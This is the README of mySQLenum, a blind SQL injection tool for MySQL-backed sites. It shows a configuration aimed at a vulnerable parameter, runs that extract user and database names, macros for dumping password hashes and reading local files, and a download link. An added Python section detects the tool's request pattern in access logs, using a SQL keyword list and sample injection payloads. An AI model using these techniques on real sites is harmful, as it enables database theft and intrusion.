mySQLenum

mySQLenum is a command-line automatic blind SQL injection tool for web applications that use a MySQL server as their back end.
It is written in pure C, does not depend on any external library, is fast, and supports all recent MySQL versions.
The enumeration algorithm was designed to reduce the number of requests executed and to limit bandwidth usage.

The tool is configured by editing the mysqlenum.conf file.

Example:

#Server host
host = www.example.com

#Server port
port = 80

#Vulnerable page
page = /index.php

#HTTP method
#GET or POST (Default is GET)
httpmethod = GET

#Vulnerable parameter, including its default value
#Example: vulnparam = id=9
#         vulnparam = name=hello'
#         vulnparam = code=ABC"
vulnparam = page_id=2

#String to match in the page when the query is valid (TRUE)
matchstring = Hello

#SQL query to execute
sqlquery = select user from accounts

...more options available

mySQLenum works in two modes:

Standard Mode

In this mode, mySQLenum enumerates the results of a custom query, specified in the configuration file or with the command-line option --sql-query.

Example:

$ ./mysqlenum --sql-query="select user from accounts"
mySQLenum 0.3
Copyright (C) 2009-2010 Andrea Fabrizi 

 Query: select user from accounts

 1)  admin 
 2)  local 
 3)  marco 
 4)  luca 
 5)  ---

 > Total requests: 192
 > Data sent: 63 Kb
 > Data received: 675 Kb

Macro Mode

Macro mode automatically enumerates predefined queries.
The information_schema database must be accessible to run macros 1, 2 and 3.

$ ./mysqlenum -m
mySQLenum 0.3
Copyright (C) 2009-2010 Andrea Fabrizi 

  Available macros:
    0) Test enumeration
    1) Databases enumeration
    2) Tables enumeration
    3) Fields enumeration
    4) MySQL Version
    5) Current User
    6) Current Database
    7) MySQL Users and password hashes
    8) View local file
    9) Data directory

  Your choice: 1

Databases:
 1)  information_schema 
 2)  security 
 3)  mysql 
 4)  phpmyadmin 
 5)  ---

 > Total requests: 361
 > Data sent: 136 Kb
 > Data received: 1275 Kb
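
For defenders, the request counts in the outputs above (192 requests for four short rows, 361 for four database names) are the most visible trace of this kind of enumeration in a web server log. The following Python detector is an added example, not part of mySQLenum; the log format, the token list, the threshold and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Combined-log-style line: client, request target, status, response size.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) (\d+)')
# SQL tokens that should not appear in an ordinary parameter value (assumed list).
SQL_TOKEN = re.compile(r'\b(select|union|information_schema|substring|ascii|sleep)\b', re.I)

def find_enumeration(lines, min_values=20):
    """Return one finding per (client, path, parameter) that received at least
    min_values distinct SQL-bearing values, the footprint of blind enumeration."""
    seen = defaultdict(lambda: {"values": set(), "sizes": set()})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # ignore lines that are not in the expected format
        client, target, _status, size = m.groups()
        url = urlsplit(target)
        # parse_qsl percent-decodes, so encoded keywords are matched too.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if SQL_TOKEN.search(value):
                entry = seen[(client, url.path, name)]
                entry["values"].add(value)
                entry["sizes"].add(int(size))
    return [{"client": c, "path": p, "param": n,
             "distinct_values": len(e["values"]),
             "response_sizes": sorted(e["sizes"])}
            for (c, p, n), e in sorted(seen.items())
            if len(e["values"]) >= min_values]

def sample_log():
    """Constructed access log: one enumerating client, one ordinary visitor."""
    lines = []
    for n in range(40):
        size = 5120 if n % 2 else 4873  # matched and unmatched pages differ in size
        lines.append(f'203.0.113.7 - - [10/Jan/2010:10:00:{n:02d} +0000] "GET /index.php'
                     f'?page_id=2%20AND%20(SELECT%20COUNT(*)%20FROM%20accounts)%3E{n}'
                     f' HTTP/1.1" 200 {size}')
    lines.append('198.51.100.4 - - [10/Jan/2010:10:01:00 +0000] '
                 '"GET /index.php?page_id=2 HTTP/1.1" 200 5120')
    lines.append('198.51.100.4 - - [10/Jan/2010:10:01:05 +0000] '
                 '"GET /index.php?page_id=select HTTP/1.1" 200 4873')
    return lines

if __name__ == "__main__":
    for finding in find_enumeration(sample_log()):
        print(finding)
```

With httpmethod = POST the parameter values travel in the request body, which standard access logs do not record, so this check then needs WAF or application-level request logging as its input.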


Help

$ ./mysqlenum -h
mySQLenum 0.3
 usage: ./mysqlenum [OPTION...]

 OPTIONS:
   -c,   --config		 config file (default is mysqlenum.conf).
   -q,   --sql-query		 SQL Query to execute.
   -r,   --start-row		 starts the enumeration from this row (default is the  first row).
   -m,   --macro		 start macro mode.

         --no-spinner		 disable the spinner.
         --quiet		 quiet (no output).
   -h,   --help			 this help.
   -V,   --version		 display the version and exit.
   -v,   --verbose		 be verbose (-vvv for very verbose).


Changelog version 0.3:
Download:

Source tarball mysqlenum-0.3.tar.gz

